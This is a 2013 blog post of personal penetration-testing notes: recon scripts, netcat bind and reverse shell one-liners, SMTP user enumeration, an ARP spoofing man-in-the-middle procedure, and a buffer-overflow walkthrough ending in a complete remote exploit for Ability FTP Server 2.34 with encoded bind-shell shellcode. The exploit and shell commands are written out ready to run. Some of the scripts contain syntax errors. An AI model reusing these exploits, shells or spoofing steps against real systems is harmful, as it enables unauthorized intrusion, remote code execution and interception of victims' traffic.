Tuesday, January 15, 2013
pentesting notes
*****************************************************************
Text Manipulation-
BASH(save as .sh and chmod 755):
#!/bin/bash/
grep "href=" icq.html | cut -d"/" -f3 | grep [url="http://icq.com/"]icq.com[/url] | sort -u
find IPs-
#!/bin/bash/
for name in $(cat icqservers.txt);do
host $name | grep "has address" | cut -d" " -f4
done
ping IPs-
#!/bin/bash/
for ip in $(seq 200 250);do
ping -c1 192.168.1.$ip | grep "bytes from"
done
DNS Forward-
#!/bin/bash/
host $[url="http://name.checkpoint.com/"]name.checkpoint.com[/url] | grep "has address"
done
DNS Reverse-
#!/bin/bash/
for ip in $(seq 64 79); do host 204.236.255.$ip | grep "domain name pointer ";done
Zone XFR-
#!/bin/bash/
echo "[*] Please enter a domain name:"
read domain
for fqdn in $(host -tns $domain | cut -d" " -f4);do
host -l domain $fqdn | grep "has address"
done
SNMP Bruteforce(for use with onesixtyone)-
(script to gleam local address for 161)
#!/bin/bash
for ip in $(seq 1 254); do echo ip.usally.local.$ip;done > log.txt
***************************************************************
BindShell:
nc -lvp 4444; listen on port 4444; with -e cmd.exe(or /bin/bash) is make cmd or bash,available aka: bind cmd or bash to nc.
i.e: nc -lvp 4444 -e cmd.exe
ReverseShell:
nc -v x.x.x.x 4444 connect to IP port:4444; with -e cmd.exe or /bin/bash is to forward the shell to IP on port 4444
i.e: nc -v x.x.x.x 4444 -e /bin/bash
Banner Grab:
nc -v www.x.com 80 <enter>
HEAD / HTTP1.0<enter>
or
echo -ne 'HEAD / HTTP/1.0' nc -vv <address> <port>
Netcat Portscan
nc -z -nvv -w 1 <IP> <port range>
-p port local port number
-l listen mode, for inbound connects
-e <program> to exec after connect
-o file hex dump of traffic
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h this cruft
-i secs delay interval for lines sent, ports scanned
-n numeric-only IP addresses, no DNS
-r randomize local and remote ports
-s addr local source address
-t answer TELNET negotiation
-u UDP mode
-v verbose [use twice to be more verbose]
-w secs timeout for connects and final net reads
-z zero-I/O mode [used for scanning]
NSE: nmap <IP> --script X.nse
/usr/share/nmap/scripts/asn-query.nse
/usr/local/share/nmap/scripts/auth-owners.nse
/usr/local/share/nmap/scripts/auth-spoof.nse
/usr/local/share/nmap/scripts/banner.nse
/usr/local/share/nmap/scripts/smb-brute.nse
/usr/local/share/nmap/scripts/smb-check-vulns.nse
/usr/local/share/nmap/scripts/smb-enum-domains.nse
/usr/local/share/nmap/scripts/smb-enum-groups.nse
/usr/local/share/nmap/scripts/smb-enum-processes.nse
/usr/local/share/nmap/scripts/smb-enum-sessions.nse
/usr/local/share/nmap/scripts/smb-enum-shares.nse
/usr/local/share/nmap/scripts/smb-enum-users.nse
/usr/local/share/nmap/scripts/smb-os-discovery.nse
/usr/local/share/nmap/scripts/smb-psexec.nse
/usr/local/share/nmap/scripts/smb-security-mode.nse
/usr/local/share/nmap/scripts/smb-server-stats.nse
/usr/local/share/nmap/scripts/smb-system-info.nse
/usr/local/share/nmap/scripts/smbv2-enabled.nse
/usr/local/share/nmap/scripts/smtp-commands.nse
/usr/local/share/nmap/scripts/smtp-open-relay.nse
/usr/local/share/nmap/scripts/smtp-strangeport.nse
/usr/local/share/nmap/scripts/sniffer-detect.nse
/usr/local/share/nmap/scripts/snmp-brute.nse
/usr/local/share/nmap/scripts/snmp-sysdescr.nse
/usr/local/share/nmap/scripts/socks-open-proxy.nse
/usr/local/share/nmap/scripts/sql-injection.nse
/usr/local/share/nmap/scripts/ssh-hostkey.nse
/usr/local/share/nmap/scripts/sshv1.nse
/usr/local/share/nmap/scripts/ssl-cert.nse
/usr/local/share/nmap/scripts/sslv2.nse
/usr/local/share/nmap/scripts/telnet-brute.nse
/usr/local/share/nmap/scripts/upnp-info.nse
/usr/local/share/nmap/scripts/whois.nse
/usr/local/share/nmap/scripts/x11-access.nse
Pythton:
SMTP USER CHECK-
#!/usr/bin/python
import socket
import sys
if len(sys.argv) !=2:
print "usage: vrfy.py <user name>"
sys.exit(0)
#create socket
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#connect to server
connect=s.connect(('<ip>',<port>))
#rcv & prnt banner
banner=s.recv(1024)
print banner
#send,VRFY request & print
s.send('VRFY ' + sys.argv[1] + '\r\n')
result=s.recv(1024)
print result
#close socket
s.close()
Null Session Attacks:
rpcclient -U "" <ip>
>help, srvinfo, enumdomusers, enumdomgroups, getdomwinfo
ARPSpoof Notes:
ipv6 doesnt use ARP,so not susceptible to ARP Poisoning/Spoofing.
ARP Spoofing attacks is a local attack,by default. There are ways to circumvent this,but not covered here.
You will want the following information:
Gateway : ipv4:MAC
Attacker: ipv4:MAC
Victim : ipv4:MAC
You will need the following *NIX command and BASH Script.
file2cable script:
*(1)ip forward:
echo 1 > /proc/sys/net/ipv4/ip_forward
*(2)file2cable bash script. save script as <whatever>.sh, chmod 755 <script.sh name>, execute as ./<script name>.sh
--cut--
#!/bin/bash
while [1];do
file2cable -i eth0 -f arp-victim
file2cable -i eth0 -f arp-gateway
sleep 2
done
--cut---
*(3a)VICTIM Hex Map --save as arp-victim
dest(mac) == victim
source(mac)== attacker
sender(mac)== attacker
sender(ip) == default.gateway
target(ip) == victim
both maps below are 6 bytes. best found using Wireshark.
DEST MAC | SOURCE MAC | unchanged
unchaged | SENDER MAC | SENDER.IP
TARGET MAC | TARGET.IP | unchanged
#save both maps seperately. both get loaded simultaenously by file2cable*(2).
*(3b)GATEWAY Hex Map --save as arp-gateway
dest(mac) == gateway
target(mac) == gateway
source(mac) == attacker
sender(mac) == attacker
target(ip) == gateway
DEST MAC | SOURCE MAC | unchanged
unchaged | unchanged | VICTIM.IP
TARGET MAC | TARGET.IP | unchanged
/// VICTIM PACKET ///
See *(3a) VICTIM Hex Map
---The VICTIM packet will try to fool the VICTIM machine into believing that the ATTACKER's MAC address has the IP of the Default GATEWAY (192.168.2.1). Hexedit ATTACKER HEX to GATEWAY HEX,arp -a to confirm ATTACKER HEX is same as GATEWAY HEX.
Because the more updated ARP Cache Entry, takes precedence, all traffic redirected to GATEWAY will now reach ATTACKER,who then forwards to GATEWAY.
---Now you need to create a packet for GATEWAY. You need to fool GATEWAY by making it forward all packets intended for VICTIM,to ATTACKER.
Before sending the packets to the network,enable IP forwarding*(1) on ATTACKER, so that packets arriving from VICTIM to ATTACKER will be passed on to GATEWAY.
---Now you can send ARP replies to both the GATEWAY and VICTIM, using the 'wire2cable Bash Script'.
This Bash script will send packets to the VICTIM & GATEWAY,every two seconds (so the VICTIM ARP cache does not get an opportunity to repair itself).
Now,traffic sent to the internet from VICTIM,is first sent to ATTACKER then forwarded to GATEWAY.
/// GATEWAY PACKET ///
See *(3b)GATEWAY Hex Map
Appendix of known Abillity Server 2.2.5, 2.3.2,.2.3.4,Windows 2000 Server SP4,Windows XP SP2 vulnerabillities and Exploit Code & Answers:
* At what bytes is EIP overwritten?
00C3B6B8-00C3B698(966-986th byte)
* Where will you place your shellcode?
In ESP
* How much space do you have for your shellcode?
00C3BA98 - 00C3B6B8=992 bytes
* How can you get to your shellcode?
Overwrite EIP with ESP address.
* Can you find an RET address? What is it?
Yes. example: a JMP ESP address,that can be used as a RET address,may be found
in USER32.dll and/or KERNEL32.dll. RET is used to control execution flow,such as to jump from EPI to ESP as a means to run shellcode(that is in ESP). EIP contains the address of the memory which the processor is going to execute,so we overwrite EIP with an ESP address (because ESP holds our shellcode). Before you can use a RET,you must be able to determin how many bytes are required to begin to overwrite it.
* Are there any restricted bytes in the buffer?
Yes. Null Byte '\x00'. Null Bytes will terminate a buffer,so we encode.
* Can the exploit be improved by using different exit techniques in the Metasploit shellcode?
Yes. for example?
Exit Techniques:
thread: This method is used in most exploitation scenarios where the exploited process runs the shellcode in a sub-thread and exiting this thread results in a working application/system (clean exit).
process: This method should be used with multi/handler. This method should also be used with any exploit where a master process restarts it on exit.
seh: This method should be used when there is a structured exception handler (SEH) that will restart the thread or process automatically when an error occurs
FTP Ability Server 2.34 Fuzzer:
#!/usr/bin/python
#port address is hardcoded
import socket, sys
host = sys.argv[1]
#buffer array
buffer=["A"]
counter=20
while len(buffer) <= 30:
buffer.append("A"*counter)
counter=counter+100
#fuzzed commands. APPE included to test for APPE vulnerability which is known to act the same as Ability FTP's STOR Vulnerability,both of which end in a spawned shell. Spawned shell will be the same user level as the server was running as.
#Windows XP SP2 and Windows 2000 SP4 (Ability server 2.25-34) are noted to be vulnerable. buffer length and RET are the same between STOR and APPE vulnerability.
commands=["MKD", "CWD", "GET", "STOR", "APPE"]
#fuzz l00p
for command in commands:
for string in buffer:
print ""+command+" command issued w/: "+ str(len(string))+" - bytes"
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
#send & receive. Default Login is ftp and Password is ftp. These are harcoded in. Edit as needed.
connect=s.connect((host,21))
s.recv(1024)
#send login
s.send('USER ftp\r\n')
s.recv(1024)
#send password
s.send('PASS ftp\r\n')
s.recv(1024)
#send buffer
s.send(command+' '+string+'\r\n')
s.recv(1024)
#quit
s.send('QUIT ftp \r\n')
s.close()
#Abillity Server 2.34 - Remote Vulnerabillity Proof of Concept Code.
#use: ./ASPOC.py <target IP>
#!/usr/bin/python
import socket, sys
host = sys.argv[1]
#tcp connect
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#344 Bytes | BIND Shell on PORT: 31337 | EXIT Technique: Thread | bound to CMD.exe
#encoded to mask Null Bytes
shellcode=("\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x5a"
"\xcd\xd3\x62\x83\xeb\xfc\xe2\xf4\xa6\xa7\x38\x2f\xb2\x34\x2c\x9d"
"\xa5\xad\x58\x0e\x7e\xe9\x58\x27\x66\x46\xaf\x67\x22\xcc\x3c\xe9"
"\x15\xd5\x58\x3d\x7a\xcc\x38\x2b\xd1\xf9\x58\x63\xb4\xfc\x13\xfb"
"\xf6\x49\x13\x16\x5d\x0c\x19\x6f\x5b\x0f\x38\x96\x61\x99\xf7\x4a"
"\x2f\x28\x58\x3d\x7e\xcc\x38\x04\xd1\xc1\x98\xe9\x05\xd1\xd2\x89"
"\x59\xe1\x58\xeb\x36\xe9\xcf\x03\x99\xfc\x08\x06\xd1\x8e\xe3\xe9"
"\x1a\xc1\x58\x12\x46\x60\x58\x22\x52\x93\xbb\xec\x14\xc3\x3f\x32"
"\xa5\x1b\xb5\x31\x3c\xa5\xe0\x50\x32\xba\xa0\x50\x05\x99\x2c\xb2"
"\x32\x06\x3e\x9e\x61\x9d\x2c\xb4\x05\x44\x36\x04\xdb\x20\xdb\x60"
"\x0f\xa7\xd1\x9d\x8a\xa5\x0a\x6b\xaf\x60\x84\x9d\x8c\x9e\x80\x31"
"\x09\x9e\x90\x31\x19\x9e\x2c\xb2\x3c\xa5\xa9\x0b\x3c\x9e\x5a\x83"
"\xcf\xa5\x77\x78\x2a\x0a\x84\x9d\x8c\xa7\xc3\x33\x0f\x32\x03\x0a"
"\xfe\x60\xfd\x8b\x0d\x32\x05\x31\x0f\x32\x03\x0a\xbf\x84\x55\x2b"
"\x0d\x32\x05\x32\x0e\x99\x86\x9d\x8a\x5e\xbb\x85\x23\x0b\xaa\x35"
"\xa5\x1b\x86\x9d\x8a\xab\xb9\x06\x3c\xa5\xb0\x0f\xd3\x28\xb9\x32"
"\x03\xe4\x1f\xeb\xbd\xa7\x97\xeb\xb8\xfc\x13\x91\xf0\x33\x91\x4f"
"\xa4\x8f\xff\xf1\xd7\xb7\xeb\xc9\xf1\x66\xbb\x10\xa4\x7e\xc5\x9d"
"\x2f\x89\x2c\xb4\x01\x9a\x81\x33\x0b\x9c\xb9\x63\x0b\x9c\x86\x33"
"\xa5\x1d\xbb\xcf\x83\xc8\x1d\x31\xa5\x1b\xb9\x9d\xa5\xfa\x2c\xb2"
"\xd1\x9a\x2f\xe1\x9e\xa9\x2c\xb4\x08\x32\x03\x0a\xb5\x03\x33\x02"
"\x09\x32\x05\x9d\x8a\xcd\xd3\x62");
#pad buffer /w 966 bytes of A's + 4 JMP ESP bytes from USER32.dll
#+ pad /w 16 bytes of C's + 16 bytes of NOP SLED + 654 bytes of Break
#Points + 344 Bytes of Shellcode =2000 bytes.
buffer="\x41"*966 + "\x6F\xC1\x75\x77" +"\x43"*16 + "\x90" * 16 +shellcode + "\xcc"*654
#ftp IP & port
print "-connecting to ftp.."
connect = s.connect((host,21))
data = s.recv(1024)
print "-sending USER ftp.."
s.send('USER ratdance' + '\r\n')
data = s.recv(1024)
print "-sending PASS ftp.."
s.send('PASS ftp' + '\r\n')
data = s.recv(1024)
print "-sending command APPE and buffer /w shellcode.."
s.send('APPE' +buffer+ '\r\n')
s.close()
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment